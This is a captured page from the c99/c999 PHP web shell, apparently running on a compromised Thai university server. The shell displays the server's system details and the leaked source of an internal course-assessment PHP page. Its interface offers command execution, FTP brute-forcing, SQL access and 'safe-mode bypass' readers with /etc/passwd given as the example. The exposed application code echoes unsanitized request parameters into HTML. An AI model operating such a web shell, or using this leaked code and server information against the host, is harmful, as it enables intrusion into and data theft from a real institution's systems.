!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/fileupdate/eassess/admin/   drwxr-xr-x
Free 50.75 GB of 127.8 GB (39.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     2552-05-29-1.0.03-courseInProgramTableTmp.php (17.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "../../class/clsDB.php";
include_once 
"../../class/clsConnection.php";
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../class/clsReg_SysSemesterDes.php";
include_once 
"../class/clsReg_Program.php";
include_once 
"../class/clsClassAssess.php";
include_once 
"../class/clsClassOpenForAssess.php";
include_once 
"../class/clsCourseAssess.php";
include_once 
"../class/clsHoldCourseTmp.php";

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);

$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oProg = new Program($oCR);
$oClassA = new ClassAssess($oCA);
$oClsOpen = new ClassOpenForAssess($oCA);
$oCourse = new CourseAssess($oCA);  
$oCourse_in = new CourseAssess($oCA);  
$oHCT = new HoldCourseTmp($oCA);

//doCheckAll();

?>
<script language="javascript1.2">
    function doSubmitAll(){
        window.opener.location.href="addDefineSomeCourse.php?assid=<?=$assid;?>&acadYear=<?=$acadYear;?>&semester=<?=$semester;?>&startDate=<?=$startDate;?>&endDate=<?=$endDate;?>&closeDate=<?=$closeDate;?>&selectFlag=<?=$selectFlag;?>&isPreAssess=<?=$isPreAssess;?>" ;
        window.self.close();
    }
</script>
<html>
<head>
<title>ตารางรายวิชาในหลักสูตร</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<style>
<!--
A:link {text-decoration: none }
A:visited {text-decoration: none}
A:hover {text-decoration: none; font-weight: underline}
-->
</style>
<?
//    $acadYear_1 = $GLOBALS["ACADYEAR"];
//    $semester_1 = $GLOBALS["SEMESTER"];

    
$acadYear_1 $acadYear;
    
$semester_1 $semester;
    
    
$oSse = new SysSemesterDes($oCR);
    
$oSse->SearchByKey($semester_1);
    
$oSse->GetRecord();
?>
</head>
<body bgcolor="#FFFFFF" >
<form name="pc" action="" method="post"><br>
  <table width="97%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="silver">
    <tr bgcolor="#FFFFFF"> 
      <td colspan="6" align = "center"><font face="Microsoft Sans Serif" size="2"><br>
        <b>ค้นหาจาก</b>&nbsp; 
                      <select name="selectSearch">
                        <option value="1" <? if(($selectSearch == 1) || ($selectSearch == "")){ echo "selected"; } ?>>รหัสรายวิชา</option>
                        <option value="2" <? if($selectSearch == 2){ echo "selected"; } ?>>ชื่อรายวิชา</option>
                      </select>
        <input type="text" name="inputSearch" size="30" maxlength="100">
        </font> &nbsp; <input type="submit" name="search" value="ค้นหา">
      <div align="right"><? echo $oSse->semesterName."/".$acadYear_1?></div></td>
    </tr>
    <tr bgcolor="#0066CC"> 
      <td width="12%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>เลือกสัปดาห์</b></font></td>
      <td width="14%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>ชื่อย่อ<br>หลักสูตร</b></font></td>
      <td width="46%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>รายวิชา</b></font><font face="Microsoft Sans Serif" size="2" color="#FFFFFF">&nbsp;</font></td>
      <td width="7%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>ชั้นปี</b></font></td>
      <td width="12%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>หน่วยกิต</b></font></td>
      <td width="7%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>กลุ่ม</b></font></td>
    </tr>
    <?php
    $i 
0;
    
$ck=0;
    
$countClass $oClassA->CountClassIdAtAcadSem($acadYear_1,$semester_1);
    
$countTmp $oHCT->CountClassId();
    
//ค้นหารายวิชาเฉพาะที่เปิดในปีการศึกษาและภาคการศึกษาปัจจุบัน
    //ถ้ากรณีที่ค้นหาจากรหัสรายวิชา
    
if($inputSearch != ""){ 
        if(
$selectSearch == 1){
            
$oCourse->SearchByCourseCode($inputSearch);
        }else if(
$selectSearch == 2){
            
$oCourse->SearchByCourseName($inputSearch);
        }
        while(
$oCourse->GetRecord()){
            
$oClassA->SearchByCourseIdAcadSem($oCourse->courseId,$acadYear_1,$semester_1);
            while(
$oClassA->GetRecord()) {
                
//ค้นหาจากตาราง HoldCourseTmp ถ้าซ้ำไม่นำมาแสดง
                
$oHCT->SearchByClassId($oClassA->classId);
                if(
$oHCT->GetRecord() == '0'){
                    
//$oCourse->SearchByKey($oClassA->courseId);
                    //$oCourse->GetRecord();
        
?>
        <tr> 
          <td align="center" bgcolor="#FFFFFF"><img src="../picture/new.gif" align="absmiddle" border="0" onClick="sendValue(document.forms['pc'],<?php echo $oClassA->classId;?>)"></td>
          
      <td  align="center" bgcolor="#FFFFFF"> 
        <?        
                        
if(($oClassA->programId == 0) || ($oClassA->programId == "")){
                            
$z 0;
                            
$oClsOpen->SearchByClassId($oClassA->classId);
                            while(
$oClsOpen->GetRecord()){
                                
$oProg->SearchByKey($oClsOpen->programId);  
                                
$oProg->GetRecord();
                                if(
$oProg->programAbbr != ""){
                                    
$arrCls[$z] = $oProg->programAbbr;
                                }else{
                                    
$arrCls[$z] = "<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                                
//$arrCls[$z] = $oClsOpen->programId;
                                
$z++;
                            } 
// end while oClsOpen
                            
for($a=0;$a<=$z;$a++){
                                echo 
$arrCls[$a];
                                if(
$a $z-1) echo ",<br>";
                            }
                        }else{
                            
$oProg->SearchByKey($oClassA->programId);  
                            if(
$oProg->GetRecord()){
                                if(
$oProg->programAbbr != ""){
                                    echo 
$oProg->programAbbr;
                                }else{
                                    echo 
"<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                            }
                            
//echo $oClassA->programId;
                     
}
             
?>
      </td>
          <td bgcolor="#FFFFFF"><font size="2" face="Microsoft Sans Serif"><?php echo $oCourse->courseCode.' '.$oCourse->courseName;?></font> 
          </td>
          <td bgcolor="#FFFFFF" align="center"><? echo $oClassA->studentYear ?></td>
          <td align="center" bgcolor="#FFFFFF"><font size="2" face="Microsoft Sans Serif"><?php echo $oCourse->courseUnit;?></font></td>
          <td align="center" bgcolor="#FFFFFF"><?php echo $oClassA->section ?></td>
        </tr>
    <?            
                $ck
=1;
            } else{  
//end if oHCT
                    //$oCourse_in->SearchByKey($oClassA->courseId);
                    //$oCourse_in->GetRecord();
                
?>
    <tr> 
      <td height="22" align="center" bgcolor ="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"> 
        <img src="../picture/editnew.gif" align="absmiddle" border="0" onClick="sendValue(document.forms['pc'],<?php echo $oClassA->classId;?>)"></td>
      <td height="22"  align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"> 
                <?  if(($oClassA->programId == 0) || ($oClassA->programId == "")){
                            
$z 0;
                            
$oClsOpen->SearchByClassId($oClassA->classId);
                            while(
$oClsOpen->GetRecord()){
                                
$oProg->SearchByKey($oClsOpen->programId);  
                                
$oProg->GetRecord();
                                if(
$oProg->programAbbr != ""){
                                    
$arrCls[$z] = $oProg->programAbbr;
                                }else{
                                    
$arrCls[$z] = "<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                                
//$arrCls[$z] = $oClsOpen->programId;
                                
$z++;
                            } 
// end while oClsOpen
                            
for($a=0;$a<=$z;$a++){
                                echo 
$arrCls[$a];
                                if(
$a $z-1) echo ",<br>";
                            }
                        }else{
                            
$oProg->SearchByKey($oClassA->programId);  
                            if(
$oProg->GetRecord()){
                                if(
$oProg->programAbbr != ""){
                                    echo 
$oProg->programAbbr;
                                }else{
                                    echo 
"<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                            }
                            
//echo $oClassA->programId;
                        
}
                
?>
      </td>
      <td height="22" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"><font size="2" ><?php echo $oCourse->courseCode.' '.$oCourse->courseName;?></font> 
      </td>
      <td height="22" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>" align="center"><font size="2"><? echo $oClassA->studentYear ?></font></td>
      <td height="22" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"><font size="2"><?php echo $oCourse->courseUnit;?></font></td>
      <td  height="22" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"><font size="2"><?php echo $oClassA->section ?></font></td>
    </tr>
    <?            // end else
                
$i++;
            } 
//end while oClassA
        
// end while oCouse
     
}else{
//        $countClass = $oClassA->CountClassIdAtAcadSem($acadYear_1,$semester_1);
        
$countTmp $oHCT->CountClassId();
        
//$numRow = $countClass-$countTmp;
        
$numRow $countClass;

        
//$page_size = 15 + $countTmp;
            
$page_size 10;

        
$total_page = (int)($numRow/$page_size);
        if((
$numRow%$page_size) != 0)
            
$total_page++;
    
        if(isset(
$page_id))
            
$start $page_size*($page_id-1);
        else {
            
$page_id 1;
            
$start 0;
        }

        
//$oClassA->SearchByAcadSem($acadYear_1,$semester_1);
        
$oClassA->SearchLimitPageByAcadSem($acadYear_1,$semester_1,$start$page_size);
        while(
$oClassA->GetRecord()) {
            
$oHCT->SearchByClassId($oClassA->classId);
            if(
$oHCT->GetRecord() == '0'){
                
$oCourse->SearchByKey($oClassA->courseId);
                
$oCourse->GetRecord();
    
?>
    <tr> 
      <td align="center" bgcolor="#FFFFFF"><img src="../picture/new.gif" align="absmiddle" border="0" onClick="sendValue(document.forms['pc'],<?php echo $oClassA->classId;?>)"></td>
      <td align="center" bgcolor="#FFFFFF"> 
                 <?  if(($oClassA->programId == 0) || ($oClassA->programId == "")){
                            
$z 0;
                            
$oClsOpen->SearchByClassId($oClassA->classId);
                            while(
$oClsOpen->GetRecord()){
                                
$oProg->SearchByKey($oClsOpen->programId);  
                                
$oProg->GetRecord();
                                if(
$oProg->programAbbr != ""){
                                    
$arrCls[$z] = $oProg->programAbbr;
                                }else{
                                    
$arrCls[$z] = "<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                                
//$arrCls[$z] = $oClsOpen->programId;
                                
$z++;
                            } 
// end while oClsOpen
                            
for($a=0;$a<=$z;$a++){
                                echo 
$arrCls[$a];
                                if(
$a $z-1) echo ",<br>";
                            }
                        }else{
                            
$oProg->SearchByKey($oClassA->programId);  
                            if(
$oProg->GetRecord()){
                                if(
$oProg->programAbbr != ""){
                                    echo 
$oProg->programAbbr;
                                }else{
                                    echo 
"<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                            }
                            
//echo $oClassA->programId;
                        
}
                
?>
      </td>
      <td bgcolor="#FFFFFF"><font size="2" face="Microsoft Sans Serif"><?php echo $oCourse->courseCode.' '.$oCourse->courseName;?></font> 
      </td>
      <td bgcolor="#FFFFFF" align="center"><? echo $oClassA->studentYear ?></td>
      <td align="center" bgcolor="#FFFFFF"><font size="2" face="Microsoft Sans Serif"><?php echo $oCourse->courseUnit;?></font></td>
      <td align="center" bgcolor="#FFFFFF"><?php echo $oClassA->section ?></td>
    </tr>
    <?php
                    $ck
=1;
                }else{  
//end if oHCT
                    
$oCourse->SearchByKey($oClassA->courseId);
                    
$oCourse->GetRecord();
                
?>
    <tr> 
      <td height="22" align="center" bgcolor ="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"> 
        <img src="../picture/editnew.gif" align="absmiddle" border="0"  alt="click" onClick="sendValue(document.forms['pc'],<?php echo $oClassA->classId;?>) "></td>
      <td align="center" height="22" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"> 
                <? if(($oClassA->programId == 0) || ($oClassA->programId == "")){
                            
$z 0;
                            
$oClsOpen->SearchByClassId($oClassA->classId);
                            while(
$oClsOpen->GetRecord()){
                                
$oProg->SearchByKey($oClsOpen->programId);  
                                
$oProg->GetRecord();
                                if(
$oProg->programAbbr != ""){
                                    
$arrCls[$z] = $oProg->programAbbr;
                                }else{
                                    
$arrCls[$z] = "<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                                
//$arrCls[$z] = $oClsOpen->programId;
                                
$z++;
                            } 
// end while oClsOpen
                            
for($a=0;$a<=$z;$a++){
                                echo 
$arrCls[$a];
                                if(
$a $z-1) echo ",<br>";
                            }
                        }else{
                            
$oProg->SearchByKey($oClassA->programId);  
                            if(
$oProg->GetRecord()){
                                if(
$oProg->programAbbr != ""){
                                    echo 
$oProg->programAbbr;
                                }else{
                                    echo 
"<img src = \"../picture/warn.png\" border = \"0\">";
                                }
                            }
                            
//echo $oClassA->programId;
                        
}
                
?>
      </td>
      <td height="22" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"><font size="2" ><?php echo $oCourse->courseCode.' '.$oCourse->courseName;?></font> 
      </td>
      <td height="22" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>" align="center"><font size="2"><? echo $oClassA->studentYear ?></font></td>
      <td height="22" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"><font size="2"><?php echo $oCourse->courseUnit;?></font></td>
      <td  height="22" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"><font size="2"><?php echo $oClassA->section ?></font></td>
    </tr>
    <?            }
                
//echo $i;
                
$i++; 
        } 
//end while oClassA
    
//end if courseCode
        
if($i == 0) {
    
?>
    <tr> 
      <td colspan="6" align="center" bgcolor="#FFFFFF"><font size="2" color="#FF0000" face="Microsoft Sans Serif">** 
        ไม่ปรากฏรายวิชา 
        <? 
                            
if($inputSearch != ""){
                                if(
$selectSearch == 1){
                                     echo 
"รหัสวิชา '".$inputSearch,"' "
                                }else if(
$selectSearch == 2){
                                     echo 
"ชื่อรายวิชา '".$inputSearch,"' "
                                }
                            }else {
                                echo 
"รายการ"
                            }
?>
        ดังกล่าวในฐานข้อมูล **</font></td>
    </tr>
    <?php
        
}
?>
    <tr> 
      <td colspan="3" bgcolor="#FFFFFF"> <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">หน้า-&gt; 
        <?php
                            
for ($num=1$num<=$total_page$num++) {    
                                if(
$num == $page_id)
                                        echo 
$num." ";
                                else {
                    
?>
        <a href="courseInProgramTableTmp.php?assid=<?php echo $assid;?>&acadYear=<?php echo $acadYear;?>&semester=<?php echo $semester;?>&startDate=<?php echo $startDate;?>&endDate=<?php echo $endDate;?>&closeDate=<?php echo $closeDate;?>&selectFlag=<?php echo $selectFlag;?>&page_id=<?php echo $num;?>"><?php echo '[ '.$num.' ]';?></a> 
        <?php
                                
}
                            }
                    
?>
        </font> </td>
        <td colspan="3" align="right" bgcolor="#FFFFFF"> <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">
        เลือกแล้ว <?php echo $countTmp ?> 
        รายการ <br>
        จากทั้งหมด <?php echo $countClass?> รายการ</font>
        </td>
    </tr>
  </table>
  <table width="97%" border="0" align="center" cellpadding="1" cellspacing="0" bgcolor="silver">
    <tr> 
      <td width="76%"><input type="hidden" name="cnt" value="<?php echo $i;?>"> <input type="hidden" name="assid" value="<?php echo $assid;?>"> 
        <input type="hidden" name="acadYear" value="<?php echo $acadYear;?>"> 
        <input type="hidden" name="semester" value="<?php echo $semester;?>"> 
        <input type="hidden" name="startDate" value="<?php echo $startDate;?>"> 
        <input type="hidden" name="endDate" value="<?php echo $endDate;?>">
        <input type="hidden" name="closeDate" value="<?php echo $closeDate;?>">
        <input type="hidden" name="selectFlag" value="<?php echo $selectFlag;?>">
        <input type="hidden" name="isPreAssess" value="<?php echo $isPreAssess;?>">
    </td>
      <td width="24%" align="right"></td>
    </tr>
    <tr> 
      <td colspan="2" align="center" bgcolor="#FFFFFF"><input type="button"  name="back" value="กลับหน้าหลัก"  onClick="doSubmitAll()" > 
      </td>
    </tr>
    <tr>
      <td align="center" colspan="2" bgcolor="#FFFFFF">&nbsp;</td>
    </tr>
    <tr> 
      <td  colspan="2" bgcolor="#FFFFFF">
          <table width="483" border="0">
          <tr> 
            <td width="65"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>หมายเหตุ 
              :</b></font></td>
            <td width="418"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><u>
            ใช้เมาท์คลิกที่รูปเลือกสัปดาห์ เพื่อเลือกสัปดาห์ที่เปิดสอน</u>
            </font></td>
          </tr>
           <tr> 
            <td width="65"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"></font></td>
            <td width="418"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><img src="../picture/new.gif" align="left" border="0" >  หมายถึง ยังไม่ระบุสัปดาห์</font></td>
          </tr>
               <tr> 
            <td width="65"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"></font></td>
            <td width="418"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><img src="../picture/editnew.gif" align="left" border="0" >  หมายถึง ระบุสัปดาห์แล้ว และทำการแก้ไขได้ </font></td>
          </tr>
                    <tr> 
            <td width="65"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"></font></td>
            <td width="418"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><u>ชื่อย่อหลักสูตรที่แสดงอยู่ในตาราง 
              หมายถึง </u></font></td>
          </tr>
          <? $oProg->SearchByProgramStatusY(); 
                while(
$oProg->GetRecord()){
             
?>
              <tr> 
                <td>&nbsp;</td>    
                  
            <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">
              <?  if($oProg->programAbbr != ""){
                        echo 
$oProg->programAbbr." = ".$oProg->programName;
                    }else{
                        echo 
"<img src = \"../picture/warn.png\" border = \"0\"> = ".$oProg->programName;
                    }
             
?>
              <? //echo $oProg->programId." = ".$oProg->programName; ?></font></td>
              </tr>
          <? ?>
        </table></td>
    </tr>
  </table>
</form>
</body>
</html>

<script> 
 function sendValue(f,cl){
    window.open('./timetableInCourseTmp.php?acadYear='+f.acadYear.value+'&semester='+f.semester.value+'&assid='+f.assid.value+'&startDate='+f.startDate.value+'&endDate='+f.endDate.value+'&closeDate='+f.closeDate.value+'&selectFlag='+f.selectFlag.value+'&classId='+cl+'&isPreAssess='+f.isPreAssess.value,'PopUp2','toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=0,width=640,height=550,left = 240,top = 10') ; //,height=550
    //window.close();
    }
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0128 ]--